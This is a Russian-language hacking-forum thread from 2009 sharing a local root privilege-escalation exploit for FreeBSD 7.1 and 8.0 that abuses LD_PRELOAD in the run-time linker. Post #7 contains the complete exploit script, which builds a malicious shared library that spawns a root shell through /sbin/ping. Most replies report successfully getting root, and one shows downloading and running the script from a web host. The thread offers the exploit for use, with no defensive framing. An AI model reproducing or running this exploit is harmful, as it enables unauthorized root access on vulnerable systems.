ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

FreeBSD 7.1, 8 root expl.
  #1  
Старый 01.12.2009, 13:07
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию FreeBSD 7.1, 8 root expl.

###############################
# EDB-ID: 10255
# CVE-ID: ()
# Title: FreeBSD Run-Time Link-Editor Local r00t Zeroday
# Author: Kingcope
# Published: 2009-11-30
###############################

Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"

Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

http://www.exploit-db.com/exploits/10255
 
Ответить с цитированием

  #2  
Старый 01.12.2009, 15:32
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Потестил на 6.4-RELEASE-p7 #7 - не пашет. Буду тестить дальше.
 
Ответить с цитированием

  #3  
Старый 01.12.2009, 16:18
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

7.0 поестил результат рут)
Тс респект)
7.2 тоже.

Последний раз редактировалось DimOnOID; 01.12.2009 в 16:45..
 
Ответить с цитированием

  #4  
Старый 05.12.2009, 23:25
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

7.1 рутит
 
Ответить с цитированием

  #5  
Старый 16.12.2009, 02:12
Seregakz
Познающий
Регистрация: 13.06.2009
Сообщений: 32
Провел на форуме:
42683

Репутация: 2
По умолчанию

закинте плз в откомпелированом виде)
 
Ответить с цитированием

  #6  
Старый 17.12.2009, 04:10
kodzero
Banned
Регистрация: 11.05.2009
Сообщений: 128
Провел на форуме:
718288

Репутация: 72
Отправить сообщение для kodzero с помощью ICQ
По умолчанию

7.1 Срутил.Спасибо.
 
Ответить с цитированием

  #7  
Старый 19.12.2009, 05:51
xena-mil1
Познающий
Регистрация: 17.10.2006
Сообщений: 83
Провел на форуме:
552846

Репутация: 55
По умолчанию

сам експлоит
PHP код:
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat 
env.<< _EOF
#include <stdio.h>

main() {
        
extern char **environ;
        
environ = (char**)malloc(8096);

        
environ[0] = (char*)malloc(1024);
        
environ[1] = (char*)malloc(1024);
        
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

        
execl("/sbin/ping""ping"0);
}
_EOF
gcc env
.-o env
cat 
program.<< _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        
extern char **environ;
        
environ=NULL;
        
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc 
-o program.-c program.-fPIC
gcc 
-shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.-nostartfiles
cp w00t
.so.1.0 /tmp/w00t.so.1.0
./env 


7.1 - взяло рут
6.4 - не взяло
 
Ответить с цитированием

  #8  
Старый 19.12.2009, 05:58
navigat0r
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739

Репутация: 146
Отправить сообщение для navigat0r с помощью ICQ
По умолчанию

добряк, ТС, добряк
спасибо, порутал
 
Ответить с цитированием

  #9  
Старый 12.01.2010, 18:35
M@rtein
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103

Репутация: 15
Thumbs up

FreeBSD 7.1-RELEASE-p5
рут - успешно
 
Ответить с цитированием

  #10  
Старый 20.01.2010, 22:46
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

У меня он не запускается, пишет, что файл не найден...
Мои действия:
Код:
$ cd /tmp
$ wget http://myhost.ru/w00t.sh
$ chmod 777 w00t.sh
$ ./w00t.sh
: No such file or directory
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши вопросы по уязвимостям. blackybr Уязвимости 13923 17.06.2010 20:04
Не работает бэк-коннект InFlame *nix 11 20.06.2009 16:10
про socks5 banall *nix 9 11.10.2006 10:17
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ